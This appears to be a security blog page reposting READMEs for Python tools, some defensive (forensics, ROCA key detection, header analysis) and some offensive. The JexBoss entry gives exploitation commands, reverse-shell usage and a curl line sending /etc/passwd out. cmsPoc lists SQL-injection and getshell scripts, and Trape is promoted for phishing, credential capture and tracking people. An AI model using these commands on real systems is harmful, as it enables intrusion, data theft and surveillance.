Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Python. Show all posts
Showing posts with label Python. Show all posts

Monday, February 19, 2018

Analyze The Security Of Any Domain By Finding All the Information Possible - Domain Analyzer




Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.


How
Domain analyzer takes a domain name and finds information about it, such as DNS servers, mail servers, IP addresses, mails on Google, SPF information, etc. After all the information is stored and organized it scans the ports of every IP found using nmap and perform several other security checks. After the ports are found, it uses the tool crawler.py from @verovaleros, to spider the complete web page of all the web ports found. This tool has the option to download files and find open folders.
Current version is 0.8 and the main features are:
  • It creates a directory with all the information, including nmap output files.
  • It uses colors to remark important information on the console.
  • It detects some security problems like host name problems, unusual port numbers and zone transfers.
  • It is heavily tested and it is very robust against DNS configuration problems.
  • It uses nmap for active host detection, port scanning and version information (including nmap scripts).
  • It searches for SPF records information to find new hostnames or IP addresses.
  • It searches for reverse DNS names and compare them to the hostname.
  • It prints out the country of every IP address.
  • It creates a PDF file with results.
  • It automatically detects and analyze sub-domains!
  • It searches for domains emails.
  • It checks the 192 most common hostnames in the DNS servers.
  • It checks for Zone Transfer on every DNS server.
  • It finds the reverse names of the /24 network range of every IP address.
  • It finds active host using nmap complete set of techniques.
  • It scan ports using nmap (remember that for the SYN scan you need to need root).
  • It searches for host and port information using nmap.
  • It automatically detects web servers used.
  • It crawls every web server page using our crawler.py tool. See the description below.
  • It filters out hostnames based on their name.
  • It pseudo-randomly searches N domains in Google and automatically analyze them!
  • Uses CTRL-C to stop current analysis stage and continue working.
  • It can read an external file with domain names and try to find them on the domain.

Bonus features
@verovaleros developed a separate python web crawler called "crawler.py". Its main features are:
  • Crawl http and https web sites.
  • Crawl http and https web sites not using common ports.
  • Uses regular expressions to find 'href' and 'src' html tag. Also content links.
  • Identifies relative links.
  • Identifies domain related emails.
  • Identifies directory indexing.
  • Detects references to URLs like 'file:', 'feed=', 'mailto:', 'javascript:' and others.
  • Uses CTRL-C to stop current crawler stages and continue working.
  • Identifies file extensions (zip, swf, sql, rar, etc.)
  • Download files to a directory:
    • Download every important file (images, documents, compressed files).
    • Or download specified files types.
    • Or download a predefined set of files (like 'document' files: .doc, .xls, .pdf, .odt, .gnumeric, etc.).
  • Maximum amount of links to crawl. A default value of 5000 URLs is set.
  • Follows redirections using HTML and JavaScript Location tag and HTTP response codes.

This extended edition has more features!
  • World-domination: You can automatically analyze the whole world! (if you have time)
  • Robin-hood: Although it is still in development, it will let you send automatically an email to the mails found during scan with the analysis information.
  • Robtex DNS: With this incredible function, every time you found a DNS servers with Zone Transfer, it will retrieve from the Robtex site other domains using that DNS server! It will automatically analyze them too! This can be a never ending test! Every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved can be unrelated to the first one.

Examples
  • Find 10 random domains in the .gov domain and analyze them fully (including web crawling). If it finds some Zone Transfer, retrieve more domains using them from Robtex!!
    domain_analyzer.py -d .gov -k 10 -b
  • (Very Quick and dirty) Find everything related with .edu.cn domain, store everything in directories. Do not search for active host, do not nmap scan them, do not reverse-dns the netblock, do not search for emails.
    domain_analyzer.py -d edu.cn -b -o -g -a -n
  • Analyze the 386.edu.ru domain fully
    domain_analyzer.py -d 386.edu.ru -b -o
  • (Pen tester mode). Analyze a domain fully. Do not find other domains. Print everything in a pdf file. Store everything on disk. When finished open Zenmap and show me the topology every host found at the same time!
    domain_analyzer.py -d amigos.net -o -e
  • (Quick with web crawl only). Ignore everything with 'google' on it.
    domain_analyzer.py -d mil.cn -b -o -g -a -n -v google -x '-O --reason --webxml --traceroute -sS -sV -sC -PN -n -v -p 80,4443'
  • (Everything) Crawl up to 100 URLs of this site including subdomains. Store output into a file and download every INTERESTING file found to disk.
    crawler.py -u www.386.edu.ru -w -s -m 100 -f
  • (Quick and dirty) Crawl the site very quick. Do not download files. Store the output to a file.
    crawler.py -u www.386.edu.ru -w -m 20
  • (If you want to analyze metadata later with lafoca). Verbose prints which extensions are being downloaded. Download only the set of archives corresponding to Documents (.doc, .docx, .ppt, .xls, .odt. etc.)
    crawler.py -u ieeeexplore.ieee.org/otherfiles/ -d -v
Most of these features can be deactivated.

Screenshots
  1. Example domain_analyzer.py -d .gov -k 10 -b

Installation
Just untar the .tar.gz file and copy the python files to the /usr/bin/ directory. Domain_analyzer needs to be run as root. The crawler can be run as a non-privileged user. If you want all the features (web crawler, pdf and colors), which is nice, also copy these files to /usr/bin or /usr/local/bin
  • ansistrm.py
  • crawler.py
  • pyText2pdf.py
If you have any issues with the GeoIP database, please download it from its original source here. And install it in where your system needs it, usually at /opt/local/share/GeoIP/GeoIP.dat




Share:

Tuesday, February 6, 2018

IP Tools To quickly get information about IP Address's, Web Pages and DNS records - Crips




This Tools is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.

Menu
  • Whois lookup
  • Traceroute
  • DNS Lookup
  • Reverse DNS Lookup
  • GeoIP Lookup
  • Port Scan
  • Reverse IP Lookup
  • INSTALL & UPDATE
  • Exit

Whois lookup
Determine the registered owner of a domain or IP address block with the whois tool.

Traceroute
Using mtr an advanced traceroute tool trace the path of an Internet connection.

DNS Lookup
Find DNS records for a domain, results are determined using the dig DNS tool

Reverse DNS Lookup
Find Reverse DNS records for an IP address or a range of IP addresses.

GeoIP Lookup
Find the location of an IP address using the GeoIP lookup location tool.

Port Scan
A simple TCP Port Scan to quickly determine the status of an Internet facing service or firewall.

Reverse IP Lookup
Discover web hosts sharing an IP address with a reverse IP lookup.

INSTALL & UPDATE
To install the tools directly in the system and get new update directly using terminal

Installation Linux
[✓] git clone https://github.com/Manisso/Crips.git
[✓] cd Crips && python Crips.py
[◉] 0 : INSTALL & UPDATE
[◉] -> 0
[✓] press 0
[✓] Congratulation Crips is Installed !

Installation Windows 
[✔] Download Python 2.7
[✓] Download Crips
[✓] Extract Crips into Desktop
[◉]Open CMD and type the following commands:
[✓] $cd Desktop/Crips-master/
[✓] $python crips.py




Share:

Saturday, January 27, 2018

JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool - JexBoss

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Requirements

Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
  • Download and install Python
  • Download and install Git for Windows
  • After installing, run the Git for Windows and type the following commands:
    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Features
The tool and exploits were developed and tested for:
  • JBoss Application Server versions: 3, 4, 5 and 6.
  • Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
  • /admin-console
    • tested and working in JBoss versions 5 and 6
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4, 5 and 6
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4, 5 and 6
  • Application Deserialization
    • tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
  • Servlet Deserialization
    • tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
  • Apache Struts2 CVE-2017-5638
    • tested in Apache Struts 2 applications
  • Others

Videos
  • Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

  • Exploiting JBoss Application Server with JexBoss

  • Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)


Screenshots
  • Simple usage examples:
$ python jexboss.py


  • Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080


  • Usage modes:
$ python jexboss.py -h
  • Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt


  • Results and recommendations:


Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
   jexremote=YOUR_IP:YOUR_PORT

   Example:
     Shell>jexremote=192.168.0.10:4444
  • Example:

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

Usage examples
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email protected]/etc/passwd http://your_server'
  • For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • More Options:
optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                        PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates
                        performed by the webshell in exploited server at
                        http://webshell.jexboss.net/jsp_version.txt and 2)
                        check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP
                        parameters (eg. javax.faces.ViewState, oldFormData,
                        etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in
                        Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                        (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                        checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P
                        http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in
                        JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u
                        http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when
                        exploiting Java Deserialization Vulnerabilities in
                        application layer (for now, working only against *nix
                        systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                        @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$
                        (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized
                        objects into it. (egs. -H javax.faces.ViewState or -H
                        oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                        javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload
                        automatically. (DEFAULT: commons-collections3.1 or
                        groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized
                        object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in
                        -u parameter. This will send the payload in multiple
                        formats (eg. RAW, GZIPED and BASE64) and with
                        different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for
                        each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                        line)
  -out FILENAME_RESULTS
                        File name to store the file scan results


Share:

Tuesday, January 16, 2018

Easy-To-Use Live Forensics Toolbox For Linux Endpoints - Linux Expl0rer






Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.

Capabilities

ps
  • View full process list
  • Inspect process memory map & fetch memory strings easly
  • Dump process memory in one click
  • Automaticly search hash in public services

users
  • users list

find
  • Search for suspicious files by name/regex

netstat
  • Whois

logs
  • syslog
  • auth.log(user authentication log)
  • ufw.log(firewall log)
  • bash history

anti-rootkit
  • chkrootkit

yara
  • Scan a file or directory using YARA signatures by @Neo23x0
  • Scan a running process memory address space
  • Upload your own YARA signature

Requirements
  • Python 2.7
  • YARA
  • chkrootkit

Installation
  1. Clone repository
git clone https://github.com/intezer/linux_expl0rer
  1. Install required packages
pip install -r requirements.txt
  1. Setup VT/OTX api keys
nano config.py
Edit following lines:
VT_APIKEY = '<key>'
OTX_APIKEY = '<key>'
  1. Install YARA
sudo apt-get install yara
  1. Install chkrootkit
sudo apt-get install chkrootkit

Start Linux Expl0rer server
sudo python linux_explorer.py

Usage
  1. Start your browser
firefox http://127.0.0.1:8080
  1. do stuff

Notes




Share:

Sunday, January 7, 2018

Infineon RSA Vulnerability - ROC




This tool is related to ACM CCS 2017 conference paper #124 Return of the Coppersmith’s Attack: Practical Factorization of Widely Used RSA Moduli.

It enables you to test public RSA keys for a presence of the described vulnerability.

Update: The paper of the attack is already online, ACM version.

Currently the tool supports the following key formats:
  • X509 Certificate, DER encoded, one per file, *.der, *.crt
  • X509 Certificate, PEM encoded, more per file, *.pem
  • RSA PEM encoded private key, public key, more per file, *.pem (has to have correct header -----BEGIN RSA...)
  • SSH public key, *.pub, starting with "ssh-rsa", one per line
  • ASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header -----BEGIN PGP...
  • APK android application, *.apk
  • one modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded number
  • JSON file with moduli, one record per line, record with modulus has key "mod" (int, base64, hex, dec encoding supported) certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER.
  • LDIFF file - LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificate
  • Java Key Store file (JKS). Tries empty password & some common, specify more with --jks-pass-file
  • PKCS7 signature with user certificate
The detection tool is intentionally one-file implementation for easy integration / manipulation.

Pip install
Install with pip (installs all dependencies)
pip install roca-detect

Local install
Execute in the root folder of the package:
pip install --upgrade --find-links=. .

Dependencies
It may be required to install additional dependencies so pip can install e.g. cryptography package.
CentOS / RHEL:
sudo yum install python-devel python-pip gcc gcc-c++ make automake autoreconf libtool openssl-devel libffi-devel dialog
Ubuntu:
sudo apt-get install python-pip python-dev build-essential libssl-dev libffi-dev swig

Usage
To print the basic usage:
# If installed with pip / manually
roca-detect --help

# Without installation (can miss dependencies)
python roca/detect.py
The testing tool accepts multiple file names / directories as the input argument. It returns the report showing how many files has been fingerprinted (and which are those).
Example (no vulnerabilities found):
Running recursively on all my SSH keys and known_hosts:

$> roca-detect ~/.ssh
2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
2017-10-16 13:39:21 [51272] INFO Records tested: 92
2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
2017-10-16 13:39:21 [51272] INFO .. PGP total keys:  0
2017-10-16 13:39:21 [51272] INFO .. SSH keys:  . . . 76
2017-10-16 13:39:21 [51272] INFO .. APK keys:  . . . 0
2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
2017-10-16 13:39:21 [51272] INFO No fingerprinted keys found (OK)
2017-10-16 13:39:21 [51272] INFO ################################
Example (vulnerabilities found):
Running recursively on all my SSH keys and known_hosts:

$> roca-detect ~/.ssh
2017-10-16 13:39:21 [51272] WARNING Fingerprint found in the Certificate
...
2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################
2017-10-16 13:39:21 [51272] INFO Records tested: 92
2017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. RSA key files: . 16
2017-10-16 13:39:21 [51272] INFO .. PGP master keys: 0
2017-10-16 13:39:21 [51272] INFO .. PGP total keys:  0
2017-10-16 13:39:21 [51272] INFO .. SSH keys:  . . . 76
2017-10-16 13:39:21 [51272] INFO .. APK keys:  . . . 0
2017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 0
2017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 0
2017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 0
2017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 0
2017-10-16 13:39:21 [51272] INFO Fingerprinted keys found: 1
2017-10-16 13:39:21 [51272] INFO WARNING: Potential vulnerability
2017-10-16 13:39:21 [51272] INFO ################################

PGP key
In order to test your PGP key you can export it from your email client or download it from the PGP key server such as https://pgp.mit.edu/
You can also use gpg command line utility to export your public key:
gpg --armor --export [email protected] > mykey.asc

Advanced use case
Detection tool extracts information about the key which can be displayed:
roca-detect.py --dump --flatten --indent  ~/.ssh/

Advanced installation methods

Virtual environment
It is usually recommended to create a new python virtual environment for the project:
virtualenv ~/pyenv
source ~/pyenv/bin/activate
pip install --upgrade pip
pip install --upgrade --find-links=. .

Separate Python 2.7.13
We tested tool with Python 2.7.13 and it works (see Travis for more info). We have reports saying lower versions (<=2.6) do not work properly so we highly recommend using up to date Python 2.7
Use pyenv to install a new Python version locally if you cannot / don't want to update system Python.
It internally downloads Python sources and installs it to ~/.pyenv.
git clone https://github.com/pyenv/pyenv.git ~/.pyenv
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
exec $SHELL
pyenv install 2.7.13
pyenv local 2.7.13

Python 3
Basic testing routine is quite simple and works with Py3 but the rest of the code that processes the different key formats and extracts the modulus for inspection is not yet fully py3 ready.
We are working on Py3 compatible version.

Docker container
Run via Docker container to avoid environment inconsistency. Dockerfile source can be audited at https://hub.docker.com/r/unnawut/roca-detect/.
docker run --rm -v /path/to/your/keys:/keys --network none unnawut/roca-detect
Make sure to use --rm and --network none flags to disable container's network connection and delete the container after running.



Share:

A CMS Exploit Framework - cmsPoc



A CMS Exploit Framework.

Requirements
  • python2.7
  • Works on Linux, Windows

Usage
usage: cmspoc.py [-h]
 -t TYPE -s SCRIPT -u URL

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  e.g.,phpcms
  -s SCRIPT, --script SCRIPT
                        Select script
  -u URL, --url URL     Input a target url

Examples
python cmspoc.py -t phpcms -s v960_sqlinject_getpasswd -u http://10.10.10.1:2500/phpcms960


Scripts
TYPE SCRIPT DESCRIPTION
phpcms v960_sqlinject_getpasswd phpcmsv9.6.0 wap模块 sql注入 获取passwd
icms v701_sqlinject_getadmin icmsv7.0.1 admincp.php sql注入 后台任意登陆
discuz v34_delete_arbitary_files discuz ≤ v3.4 任意文件删除
beecms v40_fileupload_getshell beecms ≤ V4.0_R_20160525 文件上传漏洞


Share:

Mail Header Analyzer - MHA



Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can:
  • Identify hop delays.
  • Identify the source of the email.
  • Identify hop country.

MHA is an alternative for the following:
Name Dev Issues
MessageHeader Google Not showing all the hops.
EmailHeaders Mxtoolbox Not accurate and slow.
Message Header Analyzer Microsoft Broken UI.

Installation
Install system dependencies:
sudo apt-get update
sudo apt-get install python-pip
sudo pip install virtualenv
Create a Python virtual environment and activate it:
virtualenv virt
source virt/bin/activate
Clone the GitHub repo:
git clone https://github.com/lnxg33k/MHA.git
Install Python dependencies:
cd MHA
pip install -r requirements.txt
Run the development server:
python server.py -d
You can change the bind address or port by specifying the appropriate options: python server.py -b 0.0.0.0 -p 8080
Everything should go well, now visit http://localhost:8080.

Docker
A Dockerfile is provided if you wish to build a docker image.
docker build -t mha:latest .
You can then run a container with:
docker run -d -p 8080:8080 mha:latest





Share:

People tracker on the Internet (The evolution of phishing attacks) OSINT - Trape


Trape is a recognition tool that allows you to track people, the information you can get is very detailed. We want to teach the world through this, as large Internet companies could monitor you, obtaining information beyond your IP.

Some benefits
  • One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP)
  • Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions)
  • Registration of victims, requests among other data are obtained in real time.
  • If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior.
  • You can do real time phishing attacks
  • Simple hooking attacks
  • Mapping
  • Important details of the objective
  • Capturing credentials
  • Open Source Intelligence (OSINT)

Recognizes the sessions of the following services
  • Facebook
  • Twitter
  • VK
  • Reddit
  • Gmail
  • tumblr
  • Instagram
  • Github
  • Bitbucket
  • Dropbox
  • Spotify
  • PayPal
  • Amazon

How to use it
First unload the tool.
git clone https://github.com/boxug/trape.git
cd trape
python trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
pip install -r requirements.txt
Example of execution
Example: python trape.py --url http://example.com --port 8080
  • In the option --url you must put the lure, can be a news page, an article something that serves as a presentation page.
  • In the --port option you just put the port where you want it to run
  • Do you like to monitor your people? Everything is possible with Trape
  • Do you want to perform phishing attacks? Everything is possible with Trape
  • In the Files directory, located on the path: /static/files here you add the files with .exe extension or download files sent to the victim.

Here are some simple videos to use:
Spanish: https://www.youtube.com/watch?v=ptyuCQmMKiQ
English: https://www.youtube.com/watch?v=FdwyIZhUx3Y
At an international security event in Colombia, called DragonJAR Security Conference 2017, a demonstration was made before the launch. You can watch the video here: https://www.youtube.com/watch?v=vStSEsznxgE

Disclaimer
This tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developers or participants
The following people are part of the core of development and research in Boxug.
This development and others, the participants will be mentioned with name, Twitter and charge.


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition